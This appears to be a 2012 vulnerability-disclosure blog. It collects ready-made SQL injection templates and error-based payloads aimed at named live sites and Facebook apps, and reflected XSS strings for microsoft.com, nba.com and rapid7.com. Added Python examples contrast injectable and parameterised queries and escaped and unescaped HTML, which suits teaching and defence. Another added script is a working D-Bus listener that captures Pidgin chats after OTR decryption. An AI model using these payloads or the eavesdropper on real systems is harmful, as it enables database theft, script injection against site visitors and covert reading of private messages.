Monday, 12. March 2012
Coppermine Photo Gallery – Upload Vulnerability
On Monday, 12. Mar 2012 in the topic 'Vulnerabilities'
Google dork: “Powered by Coppermine Photo Gallery”
POC: http://[localhost]/Patch/upload.php
File:
jpg, xlx, txt, bmp, doc, mp4, etc
by
fikri-badboy
OWASP Mantra - URL Shortener Script - SQL
On Monday, 12. Mar 2012 in the topic 'Vulnerabilities'
URL Shortener Script 1.0 SQL Injection Vulnerability
Exploit-DB URL: http://www.exploit-db.com/exploits/17937/
SQL injection cheat sheets:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/
How to: Create a simple URL shortener script in a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...
Injection templates for show.php (the id value 1234.5 matches no stored link, so the row added by the UNION is the only one the page renders; replace the upper-case placeholders):
Getting databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--
Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--
Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--
Getting data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --
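The templates above are MySQL-specific (information_schema; the unhex(hex(cast(... as char))) wrapping is the usual workaround for MySQL collation errors on UNION columns). The following added example, which is neither the exploit-db entry's code nor the shortener script's, reproduces the same union-based extraction against an in-memory SQLite database with a constructed schema, next to the parameterised lookup that stops it. The table and column names, the resolve_* function names and the SQLite payloads are assumptions standing in for the real script.

```python
import sqlite3

# Constructed stand-in for the shortener's database (the real script's schema
# is not on this page): one table of short links plus something worth stealing.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE links(id INTEGER PRIMARY KEY, url TEXT NOT NULL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pass TEXT);
        INSERT INTO links VALUES (1234, 'https://example.org/some/long/path');
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return db

def resolve_unsafe(db, id_param):
    """show.php?id= as the advisory implies: the raw parameter is pasted into
    the statement, so anything after a valid number is executed as SQL."""
    row = db.execute("SELECT url FROM links WHERE id=" + id_param).fetchone()
    return row[0] if row else None

def resolve_safe(db, id_param):
    """Same lookup with a bound parameter: the whole string is compared as a
    value and never parsed, so a payload simply matches no row."""
    row = db.execute("SELECT url FROM links WHERE id=?", (id_param,)).fetchone()
    return row[0] if row else None

# SQLite counterparts of the page's MySQL templates: sqlite_master plays the
# role of information_schema.tables, pragma_table_info() that of
# information_schema.columns. 1234.5 matches no id, so the UNION row is the
# only row and is what the page would redirect to or display.
TABLES_PAYLOAD = ("1234.5 union all select group_concat(name) from sqlite_master "
                  "where type='table'")
COLUMNS_PAYLOAD = ("1234.5 union all select group_concat(name) "
                   "from pragma_table_info('users')")
DATA_PAYLOAD = "1234.5 union all select name || ':' || pass from users limit 1"

if __name__ == "__main__":
    db = make_db()
    print("normal:", resolve_unsafe(db, "1234"))
    for payload in (TABLES_PAYLOAD, COLUMNS_PAYLOAD, DATA_PAYLOAD):
        print("unsafe:", resolve_unsafe(db, payload))
        print("safe:  ", resolve_safe(db, payload))
```

The unsafe resolver returns the table list, the column list of users and then admin:s3cret for the three payloads; the bound-parameter version returns None for all three and still resolves the legitimate id 1234. Casting or validating the id as an integer before use gives the same protection where binding is not available.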
Friday, 9. March 2012
ZetaBoards - XSS
On Friday, 9. Mar 2012 in the topic 'Vulnerabilities'
by
st2tea
Sony
Thursday, 8. March 2012
Adobe Flash Player .mp4 'cprt' Overflow
On Thursday, 8. Mar 2012 in the topic 'Vulnerabilities'
This vulnerability has been exploited in the wild as part of the
"Iran's Oil and Nuclear Situation.doc" phishing campaign.
Info
http://pastebin.com/ebvsLGBF
Wednesday, 7. March 2012
Mozilla Firefox - XSS
On Wednesday, 7. Mar 2012 in the topic 'Vulnerabilities'
Microsoft official website (microsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page URL.
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->3Ealert('Simple XSS')
Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")
by
flexxpoint
Monday, 5. March 2012
nba.com - XSS
On Monday, 5. Mar 2012 in the topic 'Vulnerabilities'
Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
Tuesday, 28. February 2012
Pidgin - OTR information leakage
On Tuesday, 28. Feb 2012 in the topic 'Vulnerabilities'
Details
libpurple is an Instant Messaging (IM) library developed by the Pidgin project. It is used by a number of IM clients including Pidgin and Adium. libpurple-based clients support the OTR (“Off-the-Record”) protocol either natively or via a plugin. The OTR messaging protocol enables users to communicate securely over any IM network.
pidgin-otr-snooping.py is a proof-of-concept Python script that connects to DBUS and prints all messages received via Pidgin’s “ReceivedImMsg” and “WroteImMsg” signals. The example below shows messages transmitted during an OTR conversation:
user@host:~$ python pidgin-otr-snooping.py
sent 'hey' to user1@example.com
received 'ho' from user1@example.com
sent 'lets go!' to user1@example.com
An exploited application that connects to DBUS (or reuses an already established connection) to listen for private messages provides identical forensic evidence (logs) as any application that connects to DBUS for legitimate purposes. It is thus difficult to identify in-memory eavesdropping of this sort, especially in cases where there is no supportive evidence that might suggest it (offending process image, related traffic logs etc.).
Download pidgin-otr-snooping.py
http://census-labs.com/media/pidgin-otr-snooping.py.txt
by
Dimitris Glynos
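The mechanism the advisory describes, as an added example that is not the census-labs script linked above: any process on the user's session bus can subscribe to libpurple's ReceivedImMsg and WroteImMsg signals and read the text after OTR has decrypted it (incoming) or before OTR encrypts it (outgoing). The signal argument layouts, the PURPLE_MESSAGE_* flag values and the D-Bus service, object path and method names are taken from the libpurple API as assumed here, not from the page; the formatting helpers are pure functions so they can be exercised without a running Pidgin.

```python
import html
import re

# Assumed libpurple D-Bus signal layouts and flag values (libpurple API, not
# from the page):
#   ReceivedImMsg(account, sender, message, conversation, flags)
#   WroteImMsg(account, who, message, conversation, flags)
PURPLE_MESSAGE_SEND = 0x0001
PURPLE_MESSAGE_RECV = 0x0002

TAG_RE = re.compile(r"<[^>]+>")

def plain_text(markup):
    """libpurple hands messages over as HTML; reduce them to what the user saw."""
    return html.unescape(TAG_RE.sub("", markup)).strip()

def log_line(flags, peer, message):
    """One log line per IM, in the shape of the advisory's sample output.
    Returns None for lines that are neither sent nor received by the user
    (system notices, error messages)."""
    text = plain_text(message)
    if flags & PURPLE_MESSAGE_SEND:
        return "sent %r to %s" % (text, peer)
    if flags & PURPLE_MESSAGE_RECV:
        return "received %r from %s" % (text, peer)
    return None

def main():
    # Needs dbus-python and PyGObject, and a running Pidgin on the session bus.
    import dbus
    from dbus.mainloop.glib import DBusGMainLoop
    from gi.repository import GLib

    DBusGMainLoop(set_as_default=True)
    bus = dbus.SessionBus()
    purple = dbus.Interface(
        bus.get_object("im.pidgin.purple.PurpleService",
                       "/im/pidgin/purple/PurpleObject"),
        "im.pidgin.purple.PurpleInterface")

    def on_received(account, sender, message, conv, flags):
        # Incoming text, already decrypted by the OTR plugin.
        print(log_line(PURPLE_MESSAGE_RECV, str(sender), str(message)))

    def on_wrote(account, who, message, conv, flags):
        # Fires for everything written to a conversation window; keep only the
        # user's own outgoing text, which at this point is still plaintext.
        if int(flags) & PURPLE_MESSAGE_SEND:
            peer = purple.PurpleConversationGetName(conv)
            print(log_line(PURPLE_MESSAGE_SEND, str(peer), str(message)))

    for name, handler in (("ReceivedImMsg", on_received), ("WroteImMsg", on_wrote)):
        bus.add_signal_receiver(handler, signal_name=name,
                                dbus_interface="im.pidgin.purple.PurpleInterface")
    GLib.MainLoop().run()

if __name__ == "__main__":
    main()
```

Nothing here is privileged: the script runs as the same user as Pidgin and leaves only the ordinary session-bus connection that any D-Bus client leaves, which is the forensic point the advisory makes.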
Monday, 27. February 2012
Metasploit - rapid7.com - XSS
On Monday, 27. Feb 2012 in the topic 'Vulnerabilities'
Homepage
http://www.rapid7.com/
XSS
URL:
hxxps://www.rapid7.com/register/metasploit-trial-key.jsp?product=Metasploit+Pro&returnPathURL=https://localhost:3790/setup/activation' onmouseover=alert(/Black.Spook/) bad='&whence=
by
black.spook
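The three reflected XSS findings on this page (microsoft.com, nba.com, rapid7.com) share one root cause: a URL parameter concatenated into markup, once inside an HTML comment and twice inside a quoted attribute. The following added example (not code from any of the advisories) pushes constructed payloads modelled on the three PoCs through hypothetical templates, once unencoded and once with contextual escaping, and parses the result to show where a browser would find injected script or an event handler. The templates, the URL-decoded form of the nba.com payload and the script element restored in the comment-breakout payload are assumptions.

```python
import html
from html.parser import HTMLParser

# Hypothetical templates standing in for the three vulnerable pages; the
# parameter names come from the advisories, the surrounding markup is assumed.
TEMPLATES = {
    "comment":     "<!-- hdrFo={v} --><p>Possibilities</p>",
    "attr-double": '<input type="hidden" name="successURL" value="{v}">',
    "attr-single": "<a href='{v}'>back</a>",
}

# Constructed payloads modelled on the three PoCs (URL-decoded; the script
# element in the first one is assumed, the page's copy lost its tags).
PAYLOADS = {
    "comment":     "mthdr02'\"--><script>alert('XSS')</script>",
    "attr-double": '" onerror="alert(1)"',
    "attr-single": "https://localhost:3790/setup/activation' onmouseover=alert(/Black.Spook/) bad='",
}

class HandlerFinder(HTMLParser):
    """Collects script elements and on* attributes: the places where injected
    JavaScript would actually run in a browser."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found.append("script")
        for name, _ in attrs:
            if name.startswith("on"):
                self.found.append(name)

def injected_js(markup):
    """Names of script elements / event handlers present in the markup."""
    parser = HandlerFinder()
    parser.feed(markup)
    parser.close()
    return parser.found

def render_unsafe(ctx, value):
    """String concatenation, as the vulnerable pages evidently did."""
    return TEMPLATES[ctx].replace("{v}", value)

def render_safe(ctx, value):
    """Contextual output encoding: escape & < > " ' before insertion. This is
    sufficient for quoted attributes and element content (an unquoted
    attribute would still be breakable with whitespace). For the comment
    context it holds only because the escaped '>' cannot close the comment;
    reflecting user input into comments should simply not be done."""
    return TEMPLATES[ctx].replace("{v}", html.escape(value, quote=True))

if __name__ == "__main__":
    for ctx, payload in PAYLOADS.items():
        print(ctx, "unsafe:", injected_js(render_unsafe(ctx, payload)))
        print(ctx, "safe:  ", injected_js(render_safe(ctx, payload)))
```

For each context the unsafe rendering yields exactly one injected execution point (script, onerror, onmouseover) and the escaped rendering yields none, which is the check a fix for any of the three pages should pass.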
Tuesday, 14. February 2012
Facebook - SQL Injection
On Tuesday, 14. Feb 2012 in the topic 'Vulnerabilities'
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/viewmycalendar/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/viewmycalendar/index.php?page=1'
----------------------------------------------------------------------
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/lifesmile/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793 FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
by
Ninja-Sec
Friday, 10. February 2012
Indianapolis Superbowl 2012 - SQL
On Friday, 10. Feb 2012 in the topic 'Vulnerabilities'
Details:
========
1.1
A SQL Injection vulnerability is detected on the official website of Indianapolis Superbowl 2012 (US).
Remote attackers can execute their own SQL commands via a remote ORDER BY SQL injection.
Vulnerable Module(s):
[+] downloadRelease.php?id=
1.2
A blind SQL Injection vulnerability is detected on the official website of Indianapolis Superbowl 2012 (US).
Remote attackers can execute their own SQL commands via remote blind SQL injection.
Vulnerable Module(s):
[+] event-detail/?id=
by
Alexander Fuchs (f0x23)